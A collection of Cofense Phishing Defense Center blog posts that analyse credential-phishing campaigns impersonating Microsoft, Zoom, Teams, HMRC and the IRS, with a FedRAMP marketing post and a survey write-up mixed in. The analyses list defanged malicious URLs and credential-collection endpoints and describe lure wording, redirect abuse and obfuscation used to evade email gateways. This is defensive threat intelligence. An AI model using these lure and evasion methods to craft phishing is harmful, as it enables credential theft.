Threat Actors Bypass Gateways with Google Ad Redirects

By Dylan Main and Harsh Patel, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has observed a phishing campaign that attempts to steal Office 365 login credentials by luring employees to accept a new Terms of Use and Privacy Policy. This new campaign has been seen across multiple organizations and uses advanced techniques to garner employee login credentials, including a Google Ad Services redirect to fool email gateways.

Figure 1: Headers

The originating IP in the headers of this email proved its source was coming from a legitimate account with the ‘from’ address “info@jtpsecurity[.]co[.]za” It appeared as though this email address was compromised and then used to send the phish to multiple employees. The word “security” in the from address could potentially lull the user into trusting the email’s origin.

Figure 2: Email Preview

At first glance, the user will see “This message was sent with High Importance.” Again, the from address contains the word security and the subject talks about a “Recent Policy Change,” creating urgency to click and handle the matter immediately.

The email body talks about accepting the newly updated “Terms of Use & Privacy Policy.” Also, it notes how this new policy will affect personal data and discontinue all active services on the user’s account. Curious users will likely want to “Learn More.”

Figure 3 shows the URL embedded in both buttons, “Accept” and “Learn More”:

Figure 3: URL redirect of the buttons

As seen in the above figure, the threat actor has utilized a Google Ad Services redirect to pilot users to their phish. This suggests that the threat actor(s) may have paid to have the URL go through an authorized source. In turn, this easily bypasses secure email gateways and exposes employees to the phish.

Upon clicking on either button, users are redirected to a duplicate of the real Microsoft page at the URL:

hXXps://microsoftoffice-servicepolicy-onlineserver[.]comisys[.]host/common/oauth2-authorize

 On this page users are presented with a pop up of the privacy policy the email mentions. In this window there are two notable logos as well, a Microsoft logo and the user’s company’s logo, in a bid to make this page appear that much more legitimate. Scrolling through the text box you can see the Privacy Statement was taken from Microsoft’s website.

Figure 4: First Page of the phishing attack

After accepting the updated policy, the user is then redirected to a Microsoft login page, which impersonates the Office 365 login page. An employee who enters their credentials and clicks “Next” will have sent the Threat Actor(s) their Microsoft credentials and compromised their account.

Figure 5: Second Page (The actual phishing)

Following the login page, users find further reason to believe the update is legitimate, one more box saying, “We’ve updated our terms.” Upon clicking the “Finish” button, they’ll be all set.

Figure 6: Third Page (Post entering credentials)

Last step: users are redirected to the legitimate Microsoft page, their Service Agreement, to complete the scam. Nothing malicious here!

Figure 7: Final Page (Official Microsoft site)

LEARN MORE about the Cofense Phishing Defense Center. See how the PDC’s managed phishing response and remediation stops the phishing attacks that elude email gateways.

Indicators of Compromise:

Network IOCs IP  
hxxps://www[.]googleadservices[.]com/pagead/aclk?sa=L&ai=C3seiJpC5XstooZGJBrPArsADp__a3lyH_4PTjAqoqKfonA8QASC7-_keYISV7IXcHaABzavQ-gPIAQmpAt6UwcHeNU0-qAMByANKqgTEAU_Q2dNvWCQ_LtumFUNLEz16PFVhg8cC3HmYEdlxma4KWUfGkvbdLFpKvCC92odSoiBTw9idw1iHRgreOTD1xyzoBBif4axm3JFTnekl_2_OeuLDQv0U_HzVVt10Iu5SkzsX6nGWyfUgPHIgJkxJqY4me8SG8d0nlmJ8PumQhJhze02bPmqEr4puzh2awPAoHoVPQ7QaXlbeJvf4W7Wexg1RGQ0EqMY8Z7YLfyh6tceagXiYGwWU1r3H9HuiISfj4G-RYYTABM-Sru2hAsAFBfoFBgglEAEYAJAGAaAGLoAHm9SvBYgHAZAHAqgHjs4bqAeT2BuoB7oGqAfw2RuoB_LZG6gHpr4bqAfs1RuoB_PRG6gH7NUbqAeW2BuoB8LaG9gHAMAIAdIIBggAEAIYGoAKAZALA5gLAcgLAYAMAeAS_6jY_crtxomjAdgTDg&ae=1&num=1&cid=CAMSeQClSFh3L5xTIDfFt35D8xjVEHFCYXr5NOlTRany4t_BBsFsAp3b7XCD0nSBKDirzhPVamy0H75uzx6gQxh5_rKDAlBAJWTUCf1Tqi6saFbojDtHd_R8dtCePj4ZvH0zHZWyRITLXvztggY2ibrWY9oLm5X8Wcuetvk&sig=AOD64_0L9hd4oCjDoroDTf6-7Fkon2bwsw&ctype=5&client=ca-pub-1169945711933407&adurl=https%3A%2F%2Fmicrosoftoffice-servicepolicy-onlineserver[.]comisys[.]host172[.]217[.]7[.]226
hxxps://microsoftoffice-servicepolicy-onlineserver[.]comisys[.]host/198[.]23[.]137[.]146
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

FedRAMP Authorization: Why ‘Moderate’ Matters

By Rose Ryan, Cofense Product Marketing Manager

FedRAMP, the federal program created to assess the security of cloud service providers (CSPs), saves time and cuts costs for U.S. government agencies that would otherwise conduct their own assessments. CSPs are granted authorizations at three impact levels: low (includes low-baseline and low-impact SaaS “li-SaaS”), moderate, and high, aligned to the impact levels based on NIST guidelines. While the high-impact level protects the most sensitive government data, the moderate-impact level meets the needs of many agencies. And the gaping chasm in requirements between moderate and low is revealing.

Why Cofense Didn’t Take the Low Road

Why make the financial commitment, endure a rigorous authorization process and establish a continuous monitoring program when we could have simply self-attested our security controls for a li-SaaS classification? Because Cofense is a security company that prioritizes providing the highest level of protection to our customers, and a low-level certification just wasn’t good enough. That is why Cofense PhishMe is in the process of achieving FedRAMP moderate status.

Moderate vs. Low Impact Levels

Got PII? Cofense Has You Covered

Cofense recognizes that our products and services handle our customers’ personally identifiable information (PII). That’s why we went all in to certify at the FedRAMP moderate level, complying with 325 stringent controls to secure our customers’ data according to confidentiality, availability, and integrity. A moderate FedRAMP authorized CSP has a far more stringent set of controls as compared to CSP with a low or li-SaaS ranking. See a list of controls here.

The impact level of a moderate service offering is based on the sensitivity of the data that an information system processes, stores, and transmits. Cofense opted for moderate FedRAMP compliance for our PhishMe solution. This required the establishment and documentation of a highly secure environment that will withstand comprehensive, rigorous review before we may engage with Federal agencies as a FedRAMP CSP.

Controls: The Numbers Say It All

Additional security controls are added as the levels progress to ensure that government data is adequately protected. High-level systems have 421 baseline controls, moderate-level systems have 325 controls, while low-level systems have only 125 controls and li-SaaS require a minimal 36 controls. Cofense opted for the moderate level, which will allow us to support a mass of government agencies.

Additional security controls are added as the levels progress to ensure that government data is adequately protected.

Continuous Assurance with Cofense

With a moderate FedRAMP authorized solution, there is a strict security implementation as well as operational requirements that PII data be protected. With a li-SaaS implementation, there is no such assurance. And it doesn’t end there. FedRAMP requires that authorized CSPs engage in continuous monitoring after authorization is achieved. The authorization can be revoked if the CSP is found to be at any point in non-compliance with FedRAMP requirements. Cofense opted for a moderate FedRAMP authorization embracing these strict requirements and ongoing monitoring to meet our customer’s security needs and assure their peace of mind. Cofense PhishMe just completed the security assessment review with the sponsoring agency and FedRAMP PMO and we are now in the final stages of the authorization process.

Learn moresee how Cofense is participating in the FedRAMP program.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Invoice Themed Phishing Emails Are Spreading from Trusted Links

By: Kian Mahdavi, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) is seeing continued growth in phishing attacks which harvests users’ credentials via genuine file-sharing websites, which are found in environments protected by Proofpoint’s Secure Email Gateway (SEG). A huge factor in this campaign is the confidence users have in emails containing the “trusted” Dropbox reference.

It is tricky for SEGs to keep up with attempts to spread phishing attacks and malware via sharing services such as Dropbox, ShareFile, WeTransfer, Google Docs, Egnyte and even SharePoint. Fortunately, a few of our clients’ users reported the phishing emails via the Cofense Reporter button.

The “traditional” methodology for attackers was to “break in.” Nowadays, they easily can “login,” thanks to sharing sites.

Figure 1 – Body of email showcasing the victory of this attack tying in with user interaction

The spear phishing attack sends a link requesting users to access a purchase order form with a (.pdf) extension. Upon clicking, the attack automatically redirects the user to their default web browser, requesting to click the “Download” button. The website will begin the download inside the “Downloads” folder. Nothing sinister going on, right?

The ‘sent addresses’ TLD – “actionsportsequipment[.]com” – coincidentally relates to the nature of the client’s industry; this demonstrates the extent the attackers went to, in a bid to slip through the “secure” environment. One must question themself: “Was I expecting this transfer?” and “Am I expecting to receive a purchase order from this sender?”

Moreover, since the emails have been authenticated against Dropbox’s internal servers, the emails pass basic email security checks such as DKIM and SPF.

Figure 2 & 3 – Downloadable purchase order file

Once the download has been completed, the user is prompted to open the (.html) link assuming the “purchase order” form would appear, however upon clicking, the campaign redirects the user to a supposed “Microsoft” login page.

In this case, the attackers used the free website builder “Weebly.com” … yet another legitimate source, further deceiving the security measures in place with trusted redirect domains and IPs which will naturally continue to be white-listed and deemed “safe” since millions of users share data with one another on a daily basis.

For this reason, the presence of the padlock appears, adding not only security on both parties, but also the illusion that the website is “secure.”

Figure 5 – Phishing site built by Weebly

Once credentials have been supplied, the campaign redirects the user to the authentic ‘office[.]com’ webpage, which could even be enough to assure users it was a genuine procedure. A user’s personal data could potentially be in the hands of the threat actor, assuming they logged in with their true Microsoft credentials.

Figure 6 – Redirect to Microsoft Office webpage  

Indicators of Compromise:

Network IOC IP
hXXps://www[.]dropbox[.]com/l/AADOPQGXtuDK03QYuvJqI0MbDlDxBTV28Cs
hXXps://www[.]dropbox[.]com/l/AAAtWq-LVZcqXBnFLinUi9rB3LpEijuPo78
162[.]125[.]6[.]1
hXXps://helpsupport0ffice20[.]weebly[.]com/ 199[.]34[.]228[.]53
199[.]34[.]228[.]54

LEARN MORE about the Cofense Phishing Defense Center. See how the PDC’s managed phishing response and remediation stops the phishing attacks that elude email gateways.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Practitioners Report the Need for Layered Email Security

By: Edward Amoroso, CEO and Analyst, TAG Cyber

In a recent survey, a majority of practitioners agreed on the need for protection that augments email gateways to deal with phishing attacks.

As phishing has become more prevalent and sophisticated, security experts have focused more on securing endpoints and email, the latter being the simplest way into an organization’s network. While cyber security teams have numerous defensive controls, according to a recent industry survey conducted jointly by TAG Cyber and Cofense, experts agree that deployed controls such as secure email gateways (SEGs) are necessary as a first line of defense but, on their own, aren’t sufficient to keep attackers from exploiting the endpoint.

On July 22, 2020, TAG Cyber and Cofense will present a webinar to discuss the survey results and present phishing defense strategies for companies who want to increase their efficacy against phishing attacks. You can learn more about the webinar and register here.

The survey asked security practitioners to answer the following question: Our security team sees phishing emails get past our Secure Email Gateway (SEG) at the following rate:

  1. Never
  2. Daily
  3. Weekly
  4. Monthly
  5. Hourly

Conducted by email and web and targeted at mid-to-senior level security practitioners, the survey concluded that 50% of organizations report that phishing emails bypass deployed SEGs daily. One respondent, the Chief Information Security Officer of a major financial institution, replied, “SEGs are getting much better at blocking emails with links and forms, but spam asking for money or hardware or simply probing for valid email addresses still get through at a daily rate.”

Another respondent, also a CISO at a financial firm responded, “Phishing emails will always get through. I don’t think any SEG is going to be 100% effective, or even 75%, because there are so many variables that can be changed to evade detection. We accept this to be true, and therefore have other controls…that can block access to the links once clicked, isolation that can render pages inert, or visual cues to indicate to the employees that the e-mail might not be safe.”

The remaining 50% of respondents reported that phishing emails bypass SEGs weekly (26%) and monthly (24%). Frank Abelson, President of Navitend, which provides managed services, including security to business and government customers, agreed that a layered approach is recommended. “Many of our clients combine gateway solutions with additional controls such as training to protect their inboxes from phishing,” he said.

Aaron Higbee, CTO of Cofense, sees this as an opportunity. “We have known for years that human detection combined with automation is necessary to protect employees from phishing attacks,” he said. “We are not surprised that this TAG Cyber survey found attacks leaking into enterprise inboxes.”

To learn more about the survey’s results and layered phishing defenses, register for the webinar.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

HMRC latest target in global COVID relief phishing campaigns

By Jake Longden, Cofense Phishing Defense Center

Taxes and rebates have long been some of a phisher’s favorite targets. Now the coronavirus has provided a fresh new way to exploit this topic: the government grants designed to help small businesses and those out of work due to the pandemic.

The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign in the U.K. that aims to harvest HMRC (Her Majesties Revenue and Customs) credentials and sensitive personal information by preying on employees who are expecting COVID relief grants.

With multiple world governments providing such grants, this is an easily modifiable tactic—simply modify the email to spoof the target country’s tax service.

Figure 1: Email Header

To add authenticity to the email, the threat actors have used an email address (hmrc@hotmail.com) with the impersonated organization in the name and set the name to match (HM Revenue & Customs). That, combined with the subject line, is a great way to attract the user’s interest (“Helping you during this covid from government”). Whilst this sentence is not using the greatest grammar, who wouldn’t want government assistance during these difficult times?

Figure 2: Email Body

When first viewing the email, the user is presented with a notification that the government is offering between £2500 and £7500 in tax grants for those whose work has been affected by the virus. The email includes a link to check their eligibility. With the government publicly and repeatedly mentioning such sums,  the email is believable to inattentive users. The attacker also mentions the “Open Government License v3.0,” a legitimate copyright license used by the Government and Crown Services, to provide additional credibility.

Figure 3: Phishing Page

Once the link is clicked, the user is presented with a realistic clone of the GOV.UK website. This may alleviate concerns a user may have and provide a false sense of security, as the page is extremely similar to the HMRC account sign-in page. The biggest red flag: the URL, just-bee.nl, is not relevant.

Figure 4: Phishing Page

Figure 5: Phishing Page

Here the user is asked to enter some very personal and sensitive data. Another sign that this is a scam: the volume and sensitivity of data requested far exceeds what is required to sign into a legitimate account. The data requested here screams “identity theft/impersonation.”

From there, the user is directed to a page that seems to be loading, to help provide the impression that the data is being processed and an eligibility check performed.

Figure 6: Processing Page

 

Network IOC IP
hXXps://www[.]lagesports[.]com/[.]tmb/xml[.]php 69[.]10[.]32[.]186
hXXps://rtoutletpremium[.]com[.]br/[.]well-known/pki-validation/UTR/index[.]php 162[.]241[.]182[.]5

 

How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots and YARA rules as we continue to track campaigns.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

New Covid-19 Phish Abuses Tax Relief Act to Steal Credentials

By Ashley Atkins, Cofense Phishing Defense Center

For the past few months, the Cofense Phishing Defense Center (PDC) has observed numerous phishing campaigns associated with the coronavirus (COVID-19) pandemic.  These COVID-19-themed phish come in various forms and tend to prey on those fearful of contracting the disease as well as those who are in dire need of economic relief. Recently, the PDC identified a unique version that deserves an overview.

For this attack the user received a malicious email impersonating the US Department of Revenue with the subject: CARES Relief Certificate. The message body references information regarding the 2019 185 Act that has received attention in media outlets and social platforms. Upon researching the Act, it is highly likely the attacker copied that information from a website, made minor changes and created this phishing email, as seen in Figure 1 below.

Figure 1: Email Body

At a glance, this email simply informs users of the tax provisions adopted from the CARES Relief Act and outlines the details regarding it. It also mentions a deadline for applying, and that in order to apply users must fill out an attached secure document. One thing to note, this email arrived a few days after the stated deadline in the email. This may be intentional on the threat actor’s part in order to instill a sense of urgency in users – “you’re late and the deadline has passed!” However, some users may be pressed enough to attempt to apply, thinking it is worth a shot if it could mean receiving relief during this pandemic.

Many obvious red flags are present in this email. Besides the unsightly format, grammatical errors and random property address, the most evident red flag is the sender’s address. The attacker has abused AWeber’s email marketing service. AWeber’s use of SenderID authentication results in the “From” line showing as “Department of Revenue <state=lrs-gov[.]tk[@]send[.]aweber[.]com> on behalf of Department Of Revenue <state[@]lrs-gov[.]tk>”. When reviewing the domain, it seems to read as “Irs” (IRS), but the first letter is actually a lower-case L. The use of the .tk top-level domain (TLD) is worth noting as well. This TLD is the country code for a New Zealand territory called Tokelau. It is also free and one of the top TLDs used in phishing attacks.

Should users go so far as to download and open the “secure” HTML attachment, they are presented with a typically formatted Microsoft login page. This may appear odd, as the threat actor has impersonated a well-known and trusted entity such as the US Department of Revenue.

The fake Microsoft login page prompts for the standard username and password.

Figure 2: Phishing Page

Once credentials are submitted, a PHP script sends the stolen information to the attacker. The HTML’s source code attempts to bypass URL detection by using base tags that splits the malicious URLs into two sections.

Figures 3- 5: Source Code

Network IOCs IP
hxxps://youdiaddy[.]ml/api/api[.]php? 192[.]236[.]194[.]247
hxxps://ijodaddy[.]cf/api/api[.]php? 23[.]254[.]230[.]115

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Zoom Phish Zooming Through Inboxes Amid Pandemic

By Ashley Tran, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign that acts as a Zoom video conference invitation to obtain Microsoft credentials from users.

As noted in numerous other articles posted by Cofense, it is no secret this pandemic has changed the threat landscape. From emails to employees regarding safety guidelines to the latest news from the WHO or CDC on Coronavirus cases in the area- threat actors have done it all to make the most of this situation, especially targeting remote workers. Within that group of remote workers there are users who are unfamiliar with teleconferencing and the emails that come with using the service. Some users may not have the best home office set up and work on monitors that barely afford them a proper view, making it difficult to look over these emails closely. The attack covered below is specifically aimed toward those users.

Figure 1– Email Bodies

For this attack, users are informed of an invite to a video conference from what appears to be “Zoom Video Communications” which is followed by either as noted in Figures 1-2. For now, this all appears to be in order, however looking more closely at the senders, there are barely noticeable typos- communcations missing an ‘i’, confrence missing an ‘e’. While this may seem like just an innocuous mistake, it’s in fact a carefully crafted scheme.

Mere hours before sending this email, the threat actors registered the domains zoomcommuncations.com and zoomvideoconfrence.com, as noted in s 3-4.

Figure 2-3: Email Body

When visiting either domain, it may appear to be a German site speaking on different Lasik treatments and surgery options. However, this is merely a cover for its true purpose of helping send malicious emails while impersonating teleconferencing giant Zoom.

The email itself is reminiscent of a legitimate Zoom communication- the blue Zoom logo, a vague mention of a video conference for users to join and a link for them to review said invitation; it’s inconspicuous enough and mostly free of the grammatical mistakes phish often contain.

Hovering over the “Review Invitation” the link shown is:

hxxps://r[.]smore[.]com/c?u=pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44=REDACTED[@]company[.]com

For this attack, the threat actor used a redirector link from Smore, a newsletter creation and distribution website. This is not the first time threat actors have used a legitimate online service’s personal redirect links to pilot users to malicious sites. In this case, this redirect link, once clicked, navigates users to:

hxxp://www[.]pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44

Which then redirects to the final page:

hxxps://logonmicrosftonlinezoomconference[.]azureedge[.]net/

For this attack, the threat actor has utilized Microsoft’s Azure is used to host the phishing domain, but this is not a new tactic. Threat actors flock to these domain hosting services due to some of the perks it offers. For this service, a free SSL certificate comes with any website hosted through it which adds a padlock next to the URL in the address bar, most people incorrectly assumes this indicates a site is legitimate. Another benefit of Azure is the customization option for the subdomain, allowing a URL to mimic or at least appear as a legitimate URL for the service attacks are attempting to impersonate. In this case, the subdomain is “logonmicrosftonlinezoomconference”, with all the keywords most users would expect to see in a Zoom email that goes to a Microsoft login page: “logon microsoft” and “zoom conference”. With both a padlock in the address bar along with relevant names displayed, this attack becomes less noticeable to most users.

Figure 4: Phishing Page

Figure 5 shows the phishing page users are presented with should they make it this far. The page is a generic Microsoft phish with an accompanying URL which, once again, seems to legitimize the phish to users.

The request is simple: “Sign in to Zoom with your Microsoft 365 account.” At face value, this seems like a completely reasonable use of credentials. And since Zoom allows for users to login in via SSO and most companies have linked Microsoft credentials to the platform, some users may even be familiar with Microsoft helping to access their Zoom account.

Meanwhile, with the user’s email appended in the URL, it in turn pre-populates the username field with that information, leaving only the password left for the user to provide.

Network IOC  IP 
hxxps://r[.]smore[.]com/c?u=pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44?e5=REDACTED[@]company.com 52[.]27[.]29[.]106
hXXp://www[.]pastell[.]in/ca07-b36n5-65m-c53b-o26v-62h-e79-t56e-c44 209[.]159[.]154[.]74
13[.]107[.]246[.]10
hXXps://logonmicrosftonlinezoomconference[.]azureedge[.]net/ 13[.]107[.]246[.]10
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

New Phishing Scam Targets Teleworkers with Bogus Microsoft Teams Notification

By: Kian Mahdavi, Cofense Phishing Defense Center

With the influx of remote workers, it’s a perfect opportunity to flood people’s inboxes with malicious emails and fake links. The Cofense Phishing Defense Center (PDC) recently uncovered a phishing campaign that targets employees to harvest their Microsoft credentials. Ironically, the phish was found in an environment protected by Microsoft’s own secure email gateway (SEG). The phishing email, which was reported to the PDC using the Cofense Reporter button, included a well thought out “AudioChat” notification link supposedly from Microsoft Teams.

Teams is one of the most popular platforms for remote employees. Predictably, the threat actors have taken this into consideration – especially during the COVID-19 pandemic with millions of people teleworking. We expect this trend to continue with similar communication platforms.

Figure 1: Email Body of an official Microsoft Teams example notification

Figure 2: Email Body of illegitimate Microsoft Teams notification

Credit where credit’s due, we were impressed by the effort of the threat actor and their high-quality social engineering tactics. The subject line reads “Chat Message in Teams”- is this just an ordinary notification?

The email content has perfect similarities between Microsoft’s services; in particular, it incorporates matching font size and color as well as the overall layout. The email also includes the generic ‘tips’ section towards the bottom half of the message, evident above in Figure 2. However, there’s a catch: despite the solid efforts of the email content, there are a few tell-tale indications this is a phish. The most obvious sign is the sender’s lengthy spoofed email address:

matcnotification[.]teamadmin_audidsenderderweeu44we7yhw[@]ssiconstructionnw[.]com

The words “notification” and “teamadmin” have been skilfully included within the account name. But more importantly, the TLD – “ssiconstructionwn” – does not contain the all-important ‘Microsoft’ reference. No prize for guessing, it is a construction company located in Seattle, Washington that the attacker has spoofed. Since the TLD is from a legitimate source, not only does it pass basic email security checks, such as DKIM and SPF, but also provides HTTPS displaying the essential green lock to the left of the URL, located below in Figure 3 – a valiant effort on behalf of the threat actor.

On top of that, the text displays: “Teammate sent you an offline message.” Notice the message practices a generic word: “teammate” rather than the specific name of the sender. Contradicting itself, the email includes an initial (JC) of the supposed sender within the avatar, further hindering the legitimacy of the email and raising suspicion.

As mentioned above, the user is requested to click on the “16 second AudioChat,” and once hovered, displays the following link:

hXXps://us19[.]campaign-archive[.]com/?u=0dce22c9638fc90b5c17ea20a&id=6652f42d20

The user’s email address (now redacted) is embedded into the above URL. Companies often use various email protection solutions, and as a result, URLs are often packaged with security phrases. In this phishing campaign, the email contains the words “safelinks.protection” planted at the very beginning of the hover link. This could trip up inquisitive readers who might overlook the rest of the URL and click.

Figure 3: Initial Phishing Page

The phishing page above, where users are forwarded, adheres to Microsoft’s protocol (an almost picture-perfect replica); of course, we are overlooking the forged URL within the web-bar. Once ‘Open Microsoft Teams’ has been clicked, the user should have been automatically redirected to the Microsoft Teams application. Instead, the user is taken on a slight detour to the final link of this phishing attack:

hXXps://imunodar[.]com/wp-content/plugins/wp-picaso/Teams/

Figure 4: Secondary Phishing Page

Once credentials have been supplied, the campaign redirects the user to the authentic ‘office[.]com’ webpage, which could even be enough to assure users it was a genuine procedure. A user’s personal data could potentially be in the hands of the threat actor, assuming they logged in with their true Microsoft credentials.

Indicators of Compromise:

Network IOC IP
hXXps://us19[.]campaign-archive[.]com/?u=0dce22c9638fc90b5c17ea20a&id=6652f42d20
hXXps://imunodar[.]com/wp-content/plugins/wp-picaso/Teams/
104[.]118[.]190[.]227

 

How Cofense Can Help

Visit Cofense’s Remote Work Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots of real phish that have evaded secure email gateway detection and other helpful resources so you can help keep your organization protected.

 
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Staff Members’ Inbox Positive for Coronavirus Themed Phish

By Ashley Tran, Cofense Phishing Defense Center

From prime ministers, members of congress to celebrities and staff of nursing homes — many have been affected by COVID-19. And the worst part? Threat actors know this and are heavily weaponizing this pandemic, exploiting the fears and concerns of users everywhere. The Cofense Phishing Defense Center (PDC) has observed a new phishing campaign found in environments protected by Microsoft and Symantec that not only impersonates a company’s management but also suggests that a fellow employee has tested positive for the disease, urging users to read an enclosed malicious attachment posed as “guidelines” or “next steps.”

As we have seen before and noted in previous Cofense blogs and media stories, Coronavirus themed phishing attacks are running rampant and attacking users across all industries. Although the attacks vary in method, the main takeaway is the same: all users must exercise the utmost caution and restraint in the face of emotionally jarring emails.

Figures 1-3: Email Bodies

The PDC has found multiple instances of this attack and a trend among them all. As demonstrated in Figures 1-3, the email subject lines are relatively similar: “Staff Member Confirmed COVID 19 Positive ID,” followed by a random string of numbers and that day’s date. The emotion these subject lines evoke in users are also the same: fear and curiosity. Emails appearing to be a “Team Update on COVID 19” and bearing their company’s name can convince end users to believe the email was sent internally. However, the true senders are revealed via the return paths:

Maga[@]tus[.]tusdns[.]com and ungrez[@]ssd7[@]linuxpl[.]com

Admittedly these emails would appear suspicious to most, but the threat actor is relying on the emotional subject line to overcome logic and push users to read just the first line of the sender information and nothing more.

The bodies of the emails have more variety and are worded differently, but the same main point: a fellow employee has the virus, so read this guideline we’ve attached to get more details or at least learn the “next steps” to take. To top it off the email is signed by “Management.”

The true part of this attack lies within the HTML file found in the email.

Figure 4 shows that the attachment has been detected as malicious by a multitude of services, however users won’t see this when they read the email.

Figure 4: VirusTotal Analysis

Figure 5: Phishing Page

Upon opening the attachment users are presented with a generic Microsoft login page, a frequently targeted brand. The difference with this phish, however, is the threat actor has superimposed the login box over a blurred document that may appear to users as the previously mentioned “guidelines” lending an even greater sense of legitimacy.

The email of the recipient is automatically appended to the username field via code in the HTML. In fact, the threat actor has painstakingly put the base64 for each of the recipient’s email addresses, which is then translated to a readable format when interacting with the phish. This snippet of code can be observed in Figure 6.

Figure 6: Email Bodies

Once a user navigates to the next page and inputs their password, the information is then sent to the compromised site:

hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423

This exchange of information can be viewed by opening developer tools on any browser and navigating to the networking tab as shown in Figure 7.

Figure 7: Phishing Page

The code found within the HTML file that hosts the phishing content employs typical malicious tactics. For example, as seen in Figure 8, the code does not look like a typical HTML code. This is because the threat actor has attempted to obfuscate their code, to make analysis as well as detection harder. However, this is nothing new for phishing campaigns that choose to utilize a HTML file. De-obfuscating the code and revealing some its methods is not difficult.

Figure 8: Obfuscated Code

To begin, the code is notably broken into different parts. Each of these parts may stand out to anyone with an eye for encoding as being Hex text and base64. These both can easily be decoded back into their original form, the true HTML code, by utilizing tools such as RapidTables and Base64 Decode.

Figure 9: De-obfuscated Code

After de-obfuscating the code, the true HTML is seen in Figure 9, revealing the threat actor has compromised, or at the very least utilized, a compromised site to host the style sheet for their phish:

hxxp://ibuykenya[.]com/vendor/doctrine/styles[.]css

Figure 10: Open Directory with Phish Resource Files

The following is the directory which the threat actor has used to store the style sheet for the phish, along with what appears to be two additional files, based on their last modified dates.

Within the code, the image seen in the background of the document can also be recovered. The image is hosted on ImgBB, yet another relatively benign image hosting site to which threat actors flock to host images for their attacks.

hxxps://i[.]ibb[.]co/dMcjCWC/image[.]png

Figure 11: Document Preview from Phish

Upon closer observation, the title of the document can be obtained. With a quick search, the image the threat actor has used to further legitimize this login page in the eyes of the user can be linked back to the legitimate document found in Figure 12.

Figure 12: Legitimate Document Utilized by Threat Actor

All these steps – the social engineering, the obfuscated code, use of official COVID health advisories and more-are designed to ensure users don’t detect the phishing attack is in progress. This phish also demonstrates the attacker’s need to employ layered techniques designed to avoid detection by email gateways, as well as the incident responder’s need for the right investigative tools to properly analyze, detect and quarantine this threat.

Network IOC  IP
hxxp://tokai-lm[.]jp/style/89887cc/5789n[.]php?98709087-87634423 150[.]60[.]156[.]116

 

How Cofense Can Help

Visit Cofense’s Coronavirus Phishing Infocenter to stay up to date as threats evolve. Our site is updated with screenshots and YARA rules as we continue to track campaigns. (edited) 

